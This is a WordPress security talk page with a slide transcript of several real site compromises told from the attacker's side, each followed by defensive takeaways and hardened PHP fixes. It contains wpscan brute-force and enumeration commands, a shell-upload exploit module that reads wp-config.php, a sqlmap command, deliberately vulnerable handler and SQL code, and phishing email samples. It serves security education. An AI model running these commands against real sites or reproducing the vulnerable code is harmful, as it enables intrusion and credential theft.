
Come to the dark side, they have cookies

Tim Nash
April 06, 2019


Everyone should be a little bit worried about the security of their site, and at conferences, lots of security talks focus on practical steps people can take.

In this talk, Tim flips the norms and instead focuses on several real examples of sites being hacked, but from the attacker's perspective. We will see whole attacks from the bad actor's point of view: identifying targets, analysing vulnerable sites, adding a payload and exploiting it. In doing so we see how sites are infected, how some tools do prevent certain attacks, and how clever (and indeed not so clever) bad actors can circumvent much of the hardening that has been done.

At each step we can analyse what could have been put in place to prevent and frustrate the attack, and then look at how this can be implemented on your site.


Transcript

  1. TIM NASH @tnash Come to the dark side They have cookies...
  2. What's the worst that can happen?

  3. None
  4. None
  5. None
  6. Client email Hi, we are going to be on the One Show in about two hours. Do you need to do anything?
  7. ruby wpscan.rb --url

  8. Intelligence gathering is fun!

  9. None
  10. function df_save_options() {
        $fields = $_REQUEST;
        foreach($fields as $key => $field) {
          if($key!="action") {
            echo $key."-".$field;
            update_option($key,$field);
          }
        }
        die();
      }
      Totally legit...
  11. None
  12. None
  13. WordPress Platform Lead at 34SP.com Former Pen Tester Co-runs WordPress Leeds Ran a small dev agency Speaks about security around the country
  14. Take aways from TV wonder Use a child theme Regularly code audit Have control of your WAF Get a disaster plan in place
  15. Magazine Hack

  16. Small print firm moved online Mom and Pop shop Uses a single WordPress site Shared hosting No in house "dev" team
  17. ruby wpscan.rb --url magazine-company.com --wordlist timspassword.dict --username admin

  18. ruby wpscan.rb --url magazine-company.com --enumerate p

  19. [+] Name: jetpack - v6.3.2 | Latest version: 6.3.2 (up to date) | Last updated: 2018-07-04T10:01:00.000Z | Location: https://magazine.com/wp-content/plugins/jetpack/ | Readme: https://magazine.com/wp-content/plugins/jetpack/readme.txt | Changelog: https://magazine.com/wp-content/plugins/jetpack/changelog.txt
  20. [+] Name: jetpack - v6.3.2 | Latest version: 6.3.2 (up to date) | Last updated: 2018-07-04T10:01:00.000Z | Location: https://magazine.com/wp-content/plugins/jetpack/ | Readme: https://magazine.com/wp-content/plugins/jetpack/readme.txt | Changelog: https://magazine.com/wp-content/plugins/jetpack/changelog.txt
  21. None
  22. /wp/wp-json/v2/users

  23. None
  24. 6eefb55db48f21dde991e2694dda58fd == tim.nash@34sp.com ???

  25. Typical WordPress update email

  26. Please update your site at timstest.ismysite.co.uk to WordPress 4.9.7. Updating with Jetpack installed is easy and only takes a few moments: https://jetpack-wordpress.com/update/timstest.isymsite.co.uk If you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help. https://wordpress.org/support/ Keeping your site updated is important for security. It also makes the internet a safer place for you and your readers. The WordPress Team
  27. Friendly familiar login.... Pre-populated username, what's missing?

  28. The actual wp.com login

  29. >> From: WordPress.com <info@xxx.com>
      >> Date: 21 September 2018 at 05:18:53 BST
      >> To: xxxx@xxxxxxxxxxxxxxxx.co.uk
      >> Subject: wordpress database upgrade required !
      >>
      >> DataBase Upgrade Required
      >>
      >> Dear Customer,
      >>
      >> Your WordPress database is out-of-date, and must be upgrade before 29/09/2018.
      >>
      >> The upgrade process may take a while, so please be patient.
      >>
      >> Click here to Upgrade Wordpress
      >>
      >> Download our free mobile app today.
      >> View stats, moderate comments, create and edit posts, and upload media.
      >> Click here to learn more.
      >> Automattic Inc. | 60 29th St. #343, San Francisco, CA 94110
  30. Take aways from our spear phishing attack Never click untrusted links Enable two-factor authentication Limit administrator users Don't use the same password on every site
  31. None
  32. Charity Hack

  33. Watford Children Charity Separated Brochure site Sharepoint/Exchange Server on site IT Manager 3rd party developers for site
  34. None
  35. use exploit/shell/divi_revslider_shell_upload
      set watfordcharity.com
      set payload exec
      set cmd cat wp-config.php
  36. <?php
      ....
      // ** MySQL settings ** //
      /** The name of the database for WordPress */
      define( 'DB_NAME', 'watford' );
      /** MySQL database username */
      define( 'DB_USER', 'watford' );
      /** MySQL database password */
      define( 'DB_PASSWORD', 'totallysecure' );
      /** MySQL hostname */
      define( 'DB_HOST', 'db.watfordcharity.com' );
  37. set cmd "ls wp-content/plugins"

  38. What's the worst that can happen?

  39. What's the worst that can happen?

  40. None
  41. Take aways from our slider attack Always keep things up to date Never rely on theme licenses to get bundled plugins The DB is not a safe place to store credentials
  42. E-Commerce Site Hack

  43. E-commerce site hack WooCommerce Powered Shop 100s of customers Small Dev Team Custom Theme and a range of plugins
  44. https://ecommerceexample.com/wp-content/themes/custom/dcss.php?id=1

  45. python sqlmap.py -u https://ecommerceexample.com/wp-content/themes/custom/dcss.php?id=1

  46. <?php
      ....
      define('SHORTINIT', true); // load minimal WordPress
      require_once '../../../wp-load.php'; // WordPress loader
  47. <?php .... $result = $wpdb->query("SELECT * FROM `{$tablename}` where `css_source`={$id}");

  48. <?php .... $id = $_GET['ID'];

  49. Take aways from our SQL attack Custom Code is our responsibility Never rely on a WAF that's in the application Always check endpoints for SQL injections
  50. Poisoning the well Small blogger Running WordPress for the first time Gets support mainly from Facebook forums
  51. Without trust we can't have security...

  52. Take aways from our poison well If someone says there's an issue, DO NOT DISMISS IT Help people to understand security Security is everyone's responsibility
  53. Security is your responsibility

  54. A bad actor needs to be right once....

  55. We need to be right all the time!

  56. TIM NASH @tnash | timnash.co.uk/security Thank you very much!
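The options handler on slide 10 writes every key in $_REQUEST straight into update_option() with no capability check, no nonce and no allowlist, and reflects the raw input back. The following is an added example, not code from the talk, showing what a hardened version of that handler looks like; the AJAX action, option names, nonce action and sanitizers are assumptions chosen for the illustration.

```php
<?php
// Added example (not from the slides): hardened replacement for the
// df_save_options() handler shown on slide 10. Hook name, option names and
// the nonce action are assumptions for this illustration.
add_action( 'wp_ajax_df_save_options', 'df_save_options_hardened' );

function df_save_options_hardened() {
    // 1. Only a logged-in user who may manage options reaches this code.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // 2. A nonce ties the request to a form this site rendered (blocks CSRF).
    check_ajax_referer( 'df_save_options_nonce', 'nonce' );

    // 3. Allowlist: only these option keys may be written, each with its
    //    own sanitizer. The original stored any key an attacker named.
    $allowed = array(
        'df_title'     => 'sanitize_text_field',
        'df_max_items' => 'absint',
        'df_home_url'  => 'esc_url_raw',
    );

    $saved = array();
    foreach ( $allowed as $key => $sanitizer ) {
        // Read from $_POST only; state-changing requests should never be GETs.
        if ( ! isset( $_POST[ $key ] ) ) {
            continue; // unknown or missing keys are ignored, never stored
        }
        $value = call_user_func( $sanitizer, wp_unslash( $_POST[ $key ] ) );
        update_option( $key, $value );
        $saved[ $key ] = $value;
    }

    // Structured JSON response instead of echoing raw request data (slide 10
    // printed $key."-".$field, a reflected-input bug in its own right).
    wp_send_json_success( $saved );
}
```

Slides 46 to 48 show the custom theme's dcss.php building a query by string-concatenating $_GET into SQL, which is what the sqlmap run on slide 45 exploits. The following added example (not the site's code) places that injectable query next to a parameterised version using $wpdb->prepare(); the table and column names, and the use of the id parameter from slide 44's URL, are assumptions.

```php
<?php
// Added example (not from the slides): the injectable lookup from slides
// 46-48 beside a parameterised version. Table/column names are assumed.
define( 'SHORTINIT', true );          // minimal WordPress bootstrap, as on slide 46
require_once '../../../wp-load.php';  // provides the global $wpdb

global $wpdb;
$table = $wpdb->prefix . 'custom_css'; // assumed table name

// Vulnerable shape from slides 47/48: the request value is pasted into the
// SQL text unquoted and unvalidated, so the query structure is attacker-controlled.
function dcss_lookup_vulnerable( $wpdb, $table ) {
    $id = $_GET['ID'];
    return $wpdb->get_results( "SELECT * FROM `{$table}` WHERE `css_source`={$id}" );
}

// Hardened: validate the type first, then let $wpdb->prepare() bind the value.
function dcss_lookup_hardened( $wpdb, $table ) {
    if ( ! isset( $_GET['id'] ) || ! ctype_digit( (string) $_GET['id'] ) ) {
        status_header( 400 );
        exit( 'invalid id' ); // reject anything that is not a plain integer
    }
    $id = absint( $_GET['id'] );
    // %d is cast to an integer by prepare(); the value never becomes SQL text.
    $sql = $wpdb->prepare(
        "SELECT `css_source`, `css_body` FROM `{$table}` WHERE `css_source` = %d LIMIT 1",
        $id
    );
    return $wpdb->get_results( $sql );
}

header( 'Content-Type: text/css; charset=utf-8' );
foreach ( dcss_lookup_hardened( $wpdb, $table ) as $row ) {
    echo $row->css_body; // assumed column; escape according to the output context
}
```

Slide 49's point stands even with the fix in place: an endpoint like this sits outside WordPress's own routing, so an in-application WAF plugin never sees it and the custom code has to defend itself.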